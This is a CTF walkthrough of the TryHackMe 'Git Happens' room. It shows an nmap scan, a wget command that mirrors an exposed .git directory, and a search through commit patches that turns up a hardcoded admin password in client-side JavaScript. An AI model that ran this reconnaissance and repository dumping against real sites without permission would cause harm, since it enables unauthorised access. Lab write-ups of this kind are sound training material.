Git Happens

Date: 24, May, 2021

Author: Dhilip Sanjay S

Click Here to go to the TryHackMe room.

Enumeration

Nmap

nmap -sC -sV -oN nmap-initial 10.10.57.41
Nmap scan report for 10.10.57.41
Host is up (0.18s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
| http-git: 
|   10.10.57.41:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 24 20:34:18 2021 -- 1 IP address (1 host up) scanned in 15.89 seconds

Git folder

By running common scripts, nmap found that .git folder is being exposed.

Downloading .git folder

Previously I used some git related tools to download the contents of .git folder.
But I found a fancy one liner using wget (recursive download):

$ wget --mirror -I .git http://10.10.57.41/.git/

[..snip..]
--2021-05-24 20:39:30--  http://10.10.57.41/.git/logs/refs/heads/master
Connecting to 10.10.57.41:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 216 [application/octet-stream]
Saving to: ‘10.10.57.41/.git/logs/refs/heads/master’

10.10.57.41/.git/logs/refs/heads/ 100%[===========================================================>]     216  --.-KB/s    in 0s      

2021-05-24 20:39:30 (9.23 MB/s) - ‘10.10.57.41/.git/logs/refs/heads/master’ saved [216/216]

FINISHED --2021-05-24 20:39:30--
Total wall clock time: 16s
Downloaded: 100 files, 60K in 0.003s (22.2 MB/s)

Analysing Git logs

By seeing the logs, we find a commit which performs SHA-512 hashing and Obfuscation.

root@kali:~/TryHackMe/git_happens/10.10.57.41# git log
[..snip..]
commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum <[email protected]>
Date:   Thu Jul 23 23:41:12 2020 +0200

    re-obfuscating the code to be really secure!

commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum <[email protected]>
Date:   Thu Jul 23 23:37:32 2020 +0200

    Security says obfuscation isnt enough.
    
    They want me to use something called 'SHA-512'

commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum <[email protected]>
Date:   Thu Jul 23 23:25:52 2020 +0200

    Obfuscated the source code.
    
    Hopefully security will be happy!

[..snip..]

Analysing to commited code

Let's look through the code using git log --patch, we could find the SHA 512 hash of admin password.
May be if we scroll further, we can find unhashed commit too!

root@kali:~/TryHackMe/git_happens/10.10.57.41# git log --patch
[..snip..]

- if (
-          username === 'admin' &&
-          passwordHash === 'HASHED_PASSWORD'
-        ) {
-          document.cookie = "login=1";
-          window.location.href = "/dashboard.html";
-        } else {
-          document.getElementById("error").innerHTML =
-            "INVALID USERNAME OR PASSWORD!";
-        }
-      }

[..snip..]

We can find the password of the admin:

[..snip..]

-        if (
-          username === "admin" &&
-          password === "SUPER_SECRET_PASSWORD"
-        ) {
-          document.cookie = "login=1";
-          window.location.href = "/dashboard.html";
-        } else {
-          document.getElementById("error").innerHTML =
-            "INVALID USERNAME OR PASSWORD!";
-        }

[..snip..]

Find the Super Secret Password

Answer: SUPER_SECRET_PASSWORD

PreviousLinux PrivEsc NextBuffer Overflow Prep

Last updated 2 years ago

hashtagEnumeration

hashtagNmap

hashtagGit folder

hashtagDownloading .git folder

hashtagAnalysing Git logs

hashtagAnalysing to commited code

hashtagFind the Super Secret Password

Enumeration

Nmap

Git folder

Downloading .git folder

Analysing Git logs

Analysing to commited code

Find the Super Secret Password